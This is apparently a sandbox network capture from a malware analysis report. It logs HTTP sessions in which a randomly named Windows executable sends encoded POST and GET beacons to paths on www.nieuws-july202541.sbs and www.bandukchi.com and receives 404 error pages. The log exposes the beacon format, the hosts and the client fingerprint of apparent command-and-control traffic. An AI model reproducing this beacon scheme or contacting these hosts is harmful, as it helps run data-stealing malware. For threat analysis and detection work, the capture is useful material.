                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.nieuws-july202541.sbs
                                                                                Origin: http://www.nieuws-july202541.sbs
                                                                                Referer: http://www.nieuws-july202541.sbs/0bvv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 47 75 78 46 63 2b 73 58 4c 79 62 58 38 4d 32 56 53 71 50 2f 34 4a 49 76 67 41 44 58 4b 2f 55 33 76 7a 42 65 78 50 43 32 4e 67 7a 4f 68 4d 4f 4c 64 62 33 46 41 77 39 6f 7a 55 43 76 5a 72 32 45 52 51 73 6a 64 73 6d 38 2f 30 37 35 30 6a 48 41 64 70 6d 75 49 61 57 7a 74 5a 6a 55 73 42 6e 4c 45 55 61 54 76 71 32 44 4f 74 45 5a 63 30 4c 4b 58 4e 55 43 34 2f 47 73 52 41 68 71 4b 64 53 4a 48 7a 51 48 46 70 36 69 51 69 34 58 33 4c 64 51 62 4f 67 6c 70 2f 6a 39 58 72 55 71 79 30 51 47 6e 47 38 4a 50 6f 44 6f 48 54 76 31 55 43 71 74 57 79 53 49 6a 6b 71 2f 38 72 44 67 78 4b 53 2b 6a 34 4b 59 32 66 30 51 6e 4e 36 48 39 51 61 6c 73 2b 35 2b 53 4e 67 3d
                                                                                Data Ascii: Y8i=GuxFc+sXLybX8M2VSqP/4JIvgADXK/U3vzBexPC2NgzOhMOLdb3FAw9ozUCvZr2ERQsjdsm8/0750jHAdpmuIaWztZjUsBnLEUaTvq2DOtEZc0LKXNUC4/GsRAhqKdSJHzQHFp6iQi4X3LdQbOglp/j9XrUqy0QGnG8JPoDoHTv1UCqtWySIjkq/8rDgxKS+j4KY2f0QnN6H9Qals+5+SNg=
                                                                                Nov 17, 2024 08:36:48.233987093 CET1236INHTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                content-type: text/html
                                                                                transfer-encoding: chunked
                                                                                content-encoding: gzip
                                                                                vary: Accept-Encoding
                                                                                date: Sun, 17 Nov 2024 07:36:48 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                Data Ascii: 1352ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                                Nov 17, 2024 08:36:48.234033108 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                                Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                                Nov 17, 2024 08:36:48.234069109 CET424INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                                Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                                Nov 17, 2024 08:36:48.234102964 CET1236INData Raw: a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b6 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4
                                                                                Data Ascii: cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$ .P,-i@DU\-
                                                                                Nov 17, 2024 08:36:48.234141111 CET1106INData Raw: 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 48 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1
                                                                                Data Ascii: uW$FNcYXp8.Y*=HIV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<s84bm; ^W^F@0pC*0I+s:F7H|He+sZD'0,p$dEzBtb($Uk65


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.450017162.0.215.33803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:50.142884970 CET3708OUTPOST /0bvv/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.nieuws-july202541.sbs
                                                                                Origin: http://www.nieuws-july202541.sbs
                                                                                Referer: http://www.nieuws-july202541.sbs/0bvv/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 47 75 78 46 63 2b 73 58 4c 79 62 58 38 4d 32 56 53 71 50 2f 34 4a 49 76 67 41 44 58 4b 2f 55 33 76 7a 42 65 78 50 43 32 4e 67 4c 4f 67 2b 47 4c 62 38 6a 46 53 67 39 6f 6f 55 43 75 5a 72 33 47 52 51 55 6e 64 73 71 7a 2f 33 44 35 31 41 66 41 4b 49 6d 75 44 61 57 7a 68 35 6a 5a 6a 68 6d 66 45 55 4b 66 76 71 47 44 4f 74 45 5a 63 32 2f 4b 51 66 38 43 36 2f 47 76 62 67 68 32 62 74 54 6b 48 7a 4a 38 46 70 2b 59 58 52 77 58 33 76 35 51 59 39 49 6c 71 66 6a 7a 61 4c 55 49 79 30 63 46 6e 47 77 46 50 6f 32 50 48 51 7a 31 57 30 43 75 4b 42 66 54 6e 6c 43 6e 68 35 33 39 6f 59 4b 64 73 66 43 32 36 64 73 6e 79 64 36 71 77 69 36 70 31 76 6c 38 52 38 6b 32 61 37 68 75 79 48 6d 4e 46 50 4c 6c 77 56 70 6b 6c 41 6a 75 77 43 72 7a 34 39 62 41 6b 63 34 53 56 7a 57 34 73 68 33 51 66 5a 32 4d 6e 70 64 50 5a 35 7a 41 39 73 2b 42 2f 4c 6d 41 33 44 58 6f 53 49 71 62 50 42 4e 57 68 48 47 51 38 62 71 6c 34 66 69 30 69 55 79 50 43 50 37 30 5a 32 30 51 58 68 54 35 77 63 38 68 48 51 30 71 67 63 67 68 37 6c 39 68 36 44 [TRUNCATED]
                                                                                Data Ascii: Y8i=GuxFc+sXLybX8M2VSqP/4JIvgADXK/U3vzBexPC2NgLOg+GLb8jFSg9ooUCuZr3GRQUndsqz/3D51AfAKImuDaWzh5jZjhmfEUKfvqGDOtEZc2/KQf8C6/Gvbgh2btTkHzJ8Fp+YXRwX3v5QY9IlqfjzaLUIy0cFnGwFPo2PHQz1W0CuKBfTnlCnh539oYKdsfC26dsnyd6qwi6p1vl8R8k2a7huyHmNFPLlwVpklAjuwCrz49bAkc4SVzW4sh3QfZ2MnpdPZ5zA9s+B/LmA3DXoSIqbPBNWhHGQ8bql4fi0iUyPCP70Z20QXhT5wc8hHQ0qgcgh7l9h6DJ1AqQEWl9v/KyFtPg/qc64vZdmn0aDlCQDtjcQNwoyfs4XQu9jHkcaqWrbVU2RCasCsz+L4bhMBIUBRF8UukGAgIvifErfr5TR4McdIgfeJdKWp7/sIsePzHgyCeeTY1FHHlKDo6o48wPbjHQ/IIvM6VHV71UP4clUv7bYpWRtaa17iJY8xWozrI05cbXIfGjGlhCPVZZLZO/4ILnC7pD5fYXEZxMfDY3zNajp/iUumubFIqVwJzbifRNc9j9LLLDLBn8WEpIdchjY34zrw5BYWQzlHhegdPgqwj9XCF0R4sXKaPGy7x2T0ibKhXEfBJE6gI3H+f9yC3JFuT3/N8b8mvPuyOZD3BJiKsofbbogveJ2NcumF5QYMSyo+UpnhsJp+SgGkv8Uz6wzGugEynxp7l5CRKfn0sRsO3zZp0W9vGjRCDYad5dqPgCzIzGdILAsFzd2xQUMZTcPzileHC3wMlt+E5D2HR17B0Na1CnS6qmHel5jgshkNJF0rPJK27+LmW/cTLROSPo5TsOtZYeAtzKgiUTsYXqPB4wx40+m/OGcOfkGb+ibsdkXBNquTJxIt+AYdKXYKzwL5fcC6r5Od2VwP/k7rzhdVouirFdsH6x0E/cEZjZsah1aVS7tUd+mt8j8Wkqh8wAS7LGywW9k4IV/8jEpaQPA [TRUNCATED]
                                                                                Nov 17, 2024 08:36:50.142910004 CET7181OUTData Raw: 4b 6c 5a 57 6c 71 6d 4b 37 67 31 6f 72 6a 66 32 6a 4a 34 74 43 67 65 71 71 64 4a 4a 36 56 48 66 5a 74 71 41 4e 36 61 42 48 4a 4e 53 67 47 64 78 61 6c 36 45 72 43 47 4a 68 4c 36 69 45 7a 30 68 55 42 56 4e 50 41 4d 64 36 42 33 74 4b 49 6f 51 66 7a
                                                                                Data Ascii: KlZWlqmK7g1orjf2jJ4tCgeqqdJJ6VHfZtqAN6aBHJNSgGdxal6ErCGJhL6iEz0hUBVNPAMd6B3tKIoQfziuKo7qo6N0m0SD1UZP0iKO+VAniBkY9Al3W0PaVg6snkuFs04YNgSfFWnAkj0fWCsIIczI288sXKHOEtThI923n1OT7FrOPovWBRM8BkigIWzrp3n0uIoR/D2fxYmhhWZKMlEpkElgXzOBRByUYypXOaqNXSUHa+N
                                                                                Nov 17, 2024 08:36:50.826848030 CET1236INHTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                content-type: text/html
                                                                                transfer-encoding: chunked
                                                                                content-encoding: gzip
                                                                                vary: Accept-Encoding
                                                                                date: Sun, 17 Nov 2024 07:36:50 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                Data Ascii: 1352ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                                Nov 17, 2024 08:36:50.826879978 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                                Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                                Nov 17, 2024 08:36:50.826895952 CET1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                                Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                                Nov 17, 2024 08:36:50.826911926 CET636INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                                Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                                Nov 17, 2024 08:36:50.826927900 CET894INData Raw: 64 45 a1 d5 7a 42 c2 fc de 74 1a 0f 9b f0 9d 62 28 c1 24 85 a4 03 55 6b b2 0f 0b 36 b1 35 12 72 7b 58 23 39 45 cb f4 78 1b 51 16 89 46 67 d2 e3 b2 a1 6c 22 05 a5 1a 3a 39 57 b9 2d c8 7d 11 65 9a 5e aa 29 e1 8e e3 05 85 61 2c 3b ed f2 40 e4 14 25
                                                                                Data Ascii: dEzBtb($Uk65r{X#9ExQFgl":9W-}e^)a,;@%vdir-8]f?p[au08jLzCf?=ne?z;+=~+Z7ZKE|?w>:a3c,X^/s@=T^+L}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.450020162.0.215.33803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:52.689620972 CET510OUTGET /0bvv/?gvyXe=EtxTw6OpYVppMB&Y8i=LsZlfLJLVWn36+29SrbHwZ4luzPZC8QC5ghK6sSKdTzC3J+tSarGA1FPkRmoEIfFSAMLZ+GzwFna9SDLC9K8A7K2msKq/CeIb1Pmlq+zJ/M9UWL1f9QpmJ4= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.nieuws-july202541.sbs
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:36:53.370141983 CET1236INHTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                content-type: text/html
                                                                                transfer-encoding: chunked
                                                                                date: Sun, 17 Nov 2024 07:36:53 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                Nov 17, 2024 08:36:53.370170116 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                                Nov 17, 2024 08:36:53.370187044 CET424INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                                Nov 17, 2024 08:36:53.370203018 CET1236INData Raw: 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 69 6d 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 70 79 72 69 67 68 74 20 7b 0a 20 20 20 20 20 20
                                                                                Data Ascii: footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .additional-info { position: relativ
                                                                                Nov 17, 2024 08:36:53.370219946 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a
                                                                                Data Ascii: display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPAAAADqCAMAAACrxjhdAAAAt1BMVEUAAAAA
                                                                                Nov 17, 2024 08:36:53.370235920 CET1236INData Raw: 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34 48 38 69 49 30 67 42 32 4d 7a 66 45 63 56 33 67 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51
                                                                                Data Ascii: SkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWS
                                                                                Nov 17, 2024 08:36:53.370250940 CET1236INData Raw: 45 43 6a 55 41 42 68 50 4c 4d 64 54 2f 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73
                                                                                Data Ascii: ECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE
                                                                                Nov 17, 2024 08:36:53.370265961 CET352INData Raw: 33 52 74 47 46 66 4c 34 6f 73 33 34 67 36 54 2b 41 6b 41 54 38 34 62 73 30 66 58 32 77 65 53 38 38 58 37 58 36 68 58 52 44 44 52 7a 64 77 48 5a 2f 35 44 32 68 6a 6a 67 68 74 33 4d 62 35 79 31 4e 49 4e 71 2b 62 65 5a 42 75 38 64 38 34 36 35 37 77
                                                                                Data Ascii: 3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+
                                                                                Nov 17, 2024 08:36:53.370553017 CET1236INData Raw: 57 6b 41 62 38 31 6b 7a 38 66 45 6f 35 4e 61 30 72 41 51 59 55 38 4b 51 45 57 45 50 53 6b 41 61 61 66 6e 52 50 69 58 45 47 48 50 43 43 62 63 6e 78 70 68 49 45 50 50 6e 68 58 63 39 58 6b 52 4e 75 48 68 33 43 77 38 4a 58 74 65 65 43 56 37 5a 6a 67
                                                                                Data Ascii: WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code {
                                                                                Nov 17, 2024 08:36:53.370579958 CET927INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f
                                                                                Data Ascii: <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> www.nieuws-july202541.sbs/cp_errordocument.shtml (port 80)


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.4500213.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:58.460618973 CET763OUTPOST /d22y/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bandukchi.com
                                                                                Origin: http://www.bandukchi.com
                                                                                Referer: http://www.bandukchi.com/d22y/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
